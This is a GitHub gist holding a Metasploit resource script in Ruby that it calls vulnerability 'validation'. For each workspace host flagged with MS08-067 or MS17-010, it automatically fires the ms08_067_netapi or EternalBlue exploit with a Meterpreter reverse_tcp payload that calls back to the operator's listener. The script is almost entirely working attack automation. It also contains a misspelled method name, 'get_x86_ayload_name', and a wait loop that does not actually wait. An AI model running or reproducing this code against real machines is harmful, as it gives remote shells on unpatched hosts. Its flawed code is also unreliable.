-
-
Save wchen-r7/f115dd2155270b3e966d7bd79b6ea60b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<ruby> | |
@job_ids = [] | |
def wait_until_jobs_done | |
while true | |
@job_ids.each do |job_id| | |
current_job_ids = framework.jobs.keys.map { |e| e.to_i } | |
sleep 1 if current_job_ids.include?(job_id) | |
end | |
return | |
end | |
end | |
def ms08_067_netapi_mod | |
framework.exploits.create('windows/smb/ms08_067_netapi') | |
end | |
def ms17_010_mod | |
framework.exploits.create('windows/smb/ms17_010_eternalblue') | |
end | |
def is_port_open?(port) | |
begin | |
sock = Socket.new(Socket::Constants::AF_INET, Socket::Constants::SOCK_STREAM, 0) | |
sock.bind(Socket.pack_sockaddr_in(port, get_lhost)) | |
rescue | |
return false | |
ensure | |
sock.close if sock && sock.kind_of?(Socket) | |
end | |
true | |
end | |
def get_x86_meterpreter_port | |
port_range = (4000..65535) | |
port_range.each do |port| | |
return port if is_port_open?(port) | |
end | |
raise RuntimeError, 'Unable to find a meterpreter port' | |
end | |
def get_x64_meterpreter_port | |
port_range = (3000..65535) | |
port_range.each do |port| | |
return port if is_port_open?(port) | |
end | |
raise RuntimeError, 'Unable to find a meterpreter port' | |
end | |
def get_x86_payload_name | |
'windows/meterpreter/reverse_tcp' | |
end | |
def get_x64_payload_name | |
'windows/x64/meterpreter/reverse_tcp' | |
end | |
def get_lhost | |
framework.datastore['LHOST'] | |
end | |
def validate_ms08_067(vuln) | |
mod = ms08_067_netapi_mod | |
mod.datastore['RHOST'] = vuln.host.address | |
mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 | |
mod.datastore['PAYLOAD'] = get_x86_ayload_name | |
mod.datastore['LHOST'] = get_lhost | |
mod.datastore['LPORT'] = get_x86_meterpreter_port | |
print_status("Validating MS08-067 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") | |
begin | |
mod.exploit_simple({ | |
'LocalOutput' => self.output, | |
'RunAsJob' => true, | |
'Payload' => get_x86_payload_name | |
}) | |
@job_ids << mod.job_id | |
rescue ::Exception => e | |
print_error(e.message) | |
end | |
end | |
def validate_ms17_010(vuln) | |
mod = ms17_010_mod | |
mod.datastore['RHOST'] = vuln.host.address | |
mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 | |
mod.datastore['PAYLOAD'] = get_x64_payload_name | |
mod.datastore['LHOST'] = get_lhost | |
mod.datastore['LPORT'] = get_x64_meterpreter_port | |
print_status("Validating MS17-010 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") | |
begin | |
mod.exploit_simple({ | |
'LocalOutput' => self.output, | |
'RunAsJob' => true, | |
'Payload' => get_x64_payload_name | |
}) | |
@job_ids << mod.job_id | |
rescue ::Exception => e | |
print_error(e.message) | |
end | |
end | |
def is_smb?(host, serv) | |
return false unless serv.host | |
return false if serv.state != Msf::ServiceState::Open | |
return false if serv.port != 445 | |
true | |
end | |
def do_validation | |
framework.db.workspace.vulns.each do |vuln| | |
case vuln.name | |
when /MS17\-010/i | |
validate_ms17_010(vuln) | |
when /MS08\-067/i | |
validate_ms08_067(vuln) | |
end | |
end | |
end | |
def setup | |
run_single("setg verbose true") | |
end | |
def main | |
if framework.datastore['LHOST'] | |
print_status('Performing validation...') | |
begin | |
do_validation | |
wait_until_jobs_done | |
rescue RuntimeError => e | |
print_error(e.message) | |
print_error("Unable to do validation") | |
end | |
end | |
end | |
setup | |
main | |
</ruby> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment